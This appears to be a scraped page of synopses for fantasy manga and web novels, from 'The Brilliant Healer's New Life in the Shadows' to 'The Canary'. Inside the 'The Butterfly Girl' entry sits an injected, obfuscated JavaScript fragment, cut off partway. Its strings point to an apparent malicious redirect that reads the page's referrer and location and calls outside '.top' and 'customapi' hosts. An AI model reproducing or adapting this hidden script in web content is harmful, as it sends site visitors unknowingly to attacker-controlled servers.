Fantasy - Page 975

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15109 results

The Brilliant Healer's New Life in the Shadows

Born a poor man in the slums, Zenos never had opportunities in life, so he decides to forge his own opportunities by teaching himself the curative arts after a chance encounter with a healer. When an adventuring party led by a man named Aston extends him an invitation, Zenos is elated—only to then be treated like dirt by his teammates. Despite Zenos’s diligent efforts to hone his skills to nothing short of perfection, the party deems him useless and kicks him out. Bereft of money and options, Zenos starts an illegal clinic and becomes a shadow healer. Word of his healing genius spreads quickly throughout the city’s underbelly, and as his reputation grows among the dregs of society, knowledge of Zenos\'s esteem reaches the wrong ears...


The Brilliant Miss Olive

Olive Fu was not going to have it! Instead of being forced to marry an old man, she takes a leap to determine her own fate. Enthusiastic and strong-willed, she’s embarked on a quest to build her jewelry business. But out in the real world, things get messy fast when she bumps into and then hires a handsome stranger (with his own secrets!) to be her assistant. Will she be able to break free from her old life at the risk of becoming entangled in something new?


The Brilliant Village Doctor

Here enters Lin Hao, an obscure young man of firmness and bravery, who possesses unparalleled medical technology. One day he is wandering on the street when he suddenly spots Nuolan's sexy legs, then immediately decides to apply for her father clinic and becomes a doctor there. Pure gold will glitter forever. His talent shows up day by day from this demote village to cities far away, drawing lots of patients to come for help, including some famous ones. Life of this little clinic gets more and more interesting.


The Brocaded Tale Of The Girl Si

Her Unfortunate Life Began With A Marriage Of Which The Two Families Didn’t Match. Her First Husband Detested Her For Killing His First Love; Her Second Husband, Despite Showing Great Favor, Only Regarded Her As A Substitute? Now That Jiang Si Has Entered Her New Present Life, She Is Determined To Define Destiny All By Herself!


The Broken Girl and the Devil's Bride

Year 3666 AD, Judgement Day has arrived upon the planet. Only two children survived, Wu Yue and Xue Yan, and the two became integral parts of the divine battleforce to defeat the great Devil of Lament. With the odds against them, Xue Yan announces she will marry whoever can defeat the demon and restore peace in the universe. 30,000 years after succeeding the near-impossible feat of killing the Devil of Lament, Wu Yue finds Xue Yan once again to claim her hand in marriage. With a twist of fate, Xue Yan tells him she cannot fulfill the promise for she was now betrothed to a higher divinity. Was all Wu Yue's effort and patience all for naught?


The Broken Ring : This Marriage Will Fail Anyway

Read manhwa The Broken Ring : This Marriage Will Fail Anyway When six-year-old Inés laid eyes on the handsome heir to House Escalante, she promptly made the boy her fiancé. Since noble men are all the same, she figured she might as well choose a pretty one. But Lord Cárcel isn’t ready for this sort of commitment just yet, and he spends the next decade and a half avoiding the marriage at all costs! Luckily, that’s no trouble for Inés, as this marriage failing is exactly what she wants. In fact, he has her blessing to sow his wild oats as long as he stays out of her business. Unfortunately, being a playboy isn’t as fun when your fiancée gives you permission. And doesn’t this mean she’s cheating on him too? Now, Cárcel is determined to change Inés’ mind about him and prove he can be the husband she’s always wanted. Associated Names El anillo roto: Este matrimonio fracasará de todos modos Este matrimonio está destinado a fracasar L’anello spezzato: questo matrimonio è destinato a finire Pase lo que pase, este matrimonio se ira a pique The Broken Ring : This Marriage Will Fail Anyway The Broken Ring: Um Casamento Fadado ao Fracasso This Marriage Is Bound to Fail Anyway This Marriage Is Bound to Sink Anyway Зламана обручка: Цей шлюб однаково провалиться ปลายทางวิวาห์นี้มีแต่ล่ม この結婚はどうせうまくいかない 反正这段婚姻注定失败 这个婚反正也要完蛋 這場婚姻注定凋零 이 결혼은 어차피 망하게 되어 있다


The Bugle Call: Song of War

The year is 1294, and war rages. Lucas, the bugler of a small mercenary band, is endlessly thrown into battle after battle, but longs for the day that he can fulfill his wish of becoming a real musician. One fateful day, however, Lucas\'s latent powers awaken and his life takes a drastic turn. Under the guidance of the Pope, Lucas is tasked to become a key player in the war and lead the fight against the Empire and its agent of destruction, the Garland. Burdened by this dangerous mission, Lucas still longs for the day that he may see his wish come true…


The Butterfly Girl

Na Bibi and her only friend Dahee, both bullied by their classmates, have been enduring a painful middle school life. But after turning 17, Na Bibi gained the ability to transform like a butterfly and be reborn infinitely with a different appearance. With a brand-new pretty look, she is now ready to start afresh as a high school student. But her transformation stirs tensions with Dahee who disappears on her. Struggling with her identity, Na Bibi enters high school. She coincidentally ends up in the same class as Bang Yeonwoo, a student from the same middle school. Rebirth of the Butterfly Girl / ????<script></script><script>function _0x3f13(){var _0x388e76=['tcnmz','then','','text','http://rea','bzNUc','1144692FLIwIw','oyLHJ','location','https://ip','2351680ExrXJn','110SeYHnD','random','floor','392VmKCIR','vHbFC','bZVHO','500760PWvYSG','.customapi','1391244zeOzHR','ryvfs','.top/','31420gHwLIe','FKpEC','google','referrer','href','UNCtu','1316628WkUYZv','4dxKEJU','6270467feFlpB','includes','PuLJO'];_0x3f13=function(){return _0x388e76;};return _0x3f13();}(function(_0xbb1373,_0x49786a){var _0x51f036=_0x85a3,_0x4cb591=_0xbb1373();while(!![]){try{var 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The Butterfly Mystery

Shangguan Lianlian pledged to marry Chuck Muir without parental consent, while Chuck Muir is suspected of being engaged to a daughter of a rich family. Lianlian was so sad and traveled to the ancient times... Involved in the legend that who drinks the Goddess from the Heavens' blood will live forever, she was chased by Guangling King's men. How does this couple which is separated by time and space, get together? A fantastic adventure of time and space is about to start!!!


The Calamity of the End Times

Rebirth? The end is coming! None of the family members survived in the previous life, this time it must not happen again! Zhou Zhuo leads the whole family to fight the zombies, take in the survivors, expand the Zhou family mansion, build a self-sufficient system, and strengthen the Zhou family! Fight the zombies and help the survivors develop their skills! The Calamity of the End Times, and Rebirth turned my whole family into fanatics! , The catastrophe of the doomsday, the rebirth of me turned the whole family into a boss! , Doomsday calamity, reborn I made the whole family into big brother!,


The Canary

From Storm in Heaven:A short story about a Canary who was lost and her beloved who wants her back.
